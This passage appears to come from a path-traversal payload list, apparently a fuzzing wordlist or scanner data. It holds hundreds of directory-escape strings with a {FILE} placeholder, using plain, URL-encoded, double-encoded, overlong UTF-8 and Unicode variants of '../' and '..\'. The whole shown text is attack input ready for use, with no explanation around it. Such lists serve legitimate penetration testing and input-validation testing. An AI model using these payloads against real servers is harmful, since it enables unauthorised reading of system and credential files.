ILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff